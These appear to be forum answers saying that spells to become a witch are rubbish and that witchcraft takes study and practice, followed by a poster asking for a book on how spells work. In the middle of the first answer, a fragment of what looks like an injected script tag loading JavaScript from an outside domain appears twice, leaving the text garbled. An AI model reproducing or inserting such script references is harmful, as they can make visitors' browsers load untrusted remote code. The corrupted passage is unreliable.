The spell sounds enough quirky to be able to let people know that it's just rubbish. You don't require any spells to be a witch. Anybody involved in witchcraft is termed as a witch. Being said so, if you are already involved in magickal arts, you are a witch! It simply means one who practises witchcraft.
That being said, any such spells that says about turning into a witch are rubbish. The spell neither will grant people powers and whatsover. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

No, it really won't add to what you can do, nor will it make you a Witch. What makes you a Witch is the studying and practicing, and hard work that you put into learning about Witchcraft. There are simply no short cuts in the process.

About witches though, I've cast a few a spells some have worked some I can see haven't. I want to read some book.about how spells work and why. I partially downloaded a book called spells and how.they work... I can't really get into it or get my head around what their explaining.
